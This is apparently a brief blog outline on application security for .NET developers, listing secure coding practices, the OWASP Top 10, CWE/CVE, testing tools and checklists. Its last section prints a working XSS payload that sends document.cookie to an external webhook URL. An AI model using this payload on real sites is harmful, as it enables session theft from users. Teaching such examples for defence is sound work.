Software security for .Net developers

Oleg Kikhtov
2 min read · Mar 8, 2021


When and why should we think about security?

Proactive vs. reactive
Cost of remediation
Secure SDLC activities

Secure Coding Practices

  1. Input Validation
  2. Output Encoding
  3. Authentication and Password Management
  4. Session Management
  5. Access Control
  6. Cryptographic Practices
  7. Error Handling and Logging
  8. Communication Security
  9. System Configuration
  10. Database Security
  11. File Management
  12. Memory Management
  13. General Coding Practices

OWASP Top 10 for Web (2017 edition)

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging & Monitoring

Weaknesses and vulnerabilities

What is the difference between a vulnerability and a weakness?

A weakness is a type of flaw in code, design or configuration that can lead to a vulnerability (for example, building a SQL query from unvalidated input). A vulnerability is a concrete, exploitable instance of a weakness in a specific product or version.

Common Weakness Enumeration (CWE): the catalogue of weakness types.

Common Vulnerabilities and Exposures (CVE): the catalogue of individual, publicly known vulnerabilities.

Application security assessment tools

  • sqlmap (open source; detects and exploits SQL injection)
  • OWASP ZAP (open source; web application scanner and intercepting proxy)
  • Burp Suite (Community Edition is free; intercepting proxy for exploring web security)

Analyze project dependencies

Platforms for practicing

Useful Checklists

  1. OWASP Application Security Verification Standard 4.0
  2. OWASP DotNet Security Cheat Sheet
  3. OWASP REST Security Cheat Sheet
  4. Transport Layer Protection Cheat Sheet

Useful links

Some useful terms you should know

  • Symmetric vs. asymmetric encryption
  • Signing the request payload
  • Denial of service (DoS)
  • Brute-force attack
  • Spoofing
  • Phishing
  • Sanitization

Useful code samples

XSS payload that exfiltrates document.cookie (works only for cookies that are not marked HttpOnly; the image load sends the cookie to the attacker's endpoint)

<img src=x onerror=this.src='https://webhook.site/63dc6b4e-3f8f-468e-bb3e-9134e31c39da/?c='+document.cookie>
